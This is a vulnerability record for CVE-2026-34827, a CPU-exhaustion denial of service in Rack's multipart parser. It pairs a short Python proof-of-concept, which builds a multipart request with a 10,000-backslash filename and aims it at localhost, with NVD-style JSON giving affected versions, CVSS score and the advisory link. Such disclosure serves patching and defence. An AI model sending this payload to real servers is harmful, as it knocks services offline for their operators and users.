CVE-2026-34827

import requests # Target URL (Example) url = "http://localhost:3000/upload" # Create a malicious filename with many backslashes # This triggers the super-linear processing in Rack::Multipart::Parser malicious_filename = "\\" * 10000 # Construct raw multipart body to ensure specific format boundary = "----WebKitFormBoundary7MA4YWxkTrZu0gW" body = f"""------{boundary} Content-Disposition: form-data; name="file"; filename="{malicious_filename}" Content-Type: text/plain File content ------{boundary}-- """ headers = { "Content-Type": f"multipart/form-data; boundary=----{boundary}", "Content-Length": str(len(body)) } # Send the malicious request # response = requests.post(url, data=body, headers=headers) # print(f"Status Code: {response.status_code}")

{"cve": {"id": "CVE-2026-34827", "sourceIdentifier": "[email protected]", "published": "2026-04-02T18:16:33.490", "lastModified": "2026-04-24T12:47:32.790", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Rack is a modular Ruby web server interface. From versions 3.0.0.beta1 to before 3.1.21, and 3.2.0 to before 3.2.6, Rack::Multipart::Parser#handle_mime_head parses quoted multipart parameters such as Content-Disposition: form-data; name=\"...\" using repeated String#index searches combined with String#slice! prefix deletion. For escape-heavy quoted values, this causes super-linear processing. An unauthenticated attacker can send a crafted multipart/form-data request containing many parts with long backslash-escaped parameter values to trigger excessive CPU usage during multipart parsing. This results in a denial of service condition in Rack applications that accept multipart form data. This issue has been patched in versions 3.1.21 and 3.2.6."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-400"}, {"lang": "en", "value": "CWE-407"}, {"lang": "en", "value": "CWE-770"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:rack:rack:*:*:*:*:*:ruby:*:*", "versionStartIncluding": "3.0.0", "versionEndExcluding": "3.1.21", "matchCriteriaId": "6948AAA6-873D-46BA-AA22-4C81138128E1"}, {"vulnerable": true, "criteria": "cpe:2.3:a:rack:rack:*:*:*:*:*:ruby:*:*", "versionStartIncluding": "3.2.0", "versionEndExcluding": "3.2.6", "matchCriteriaId": "3FB592AD-E826-49BE-AC6D-E5F55FDCC96E"}]}]}], "references": [{"url": "https://github.com/rack/rack/security/advisories/GHSA-v6x5-cg8r-vv6x", "source": "[email protected]", "tags": ["Vendor Advisory", "Mitigation"]}]}}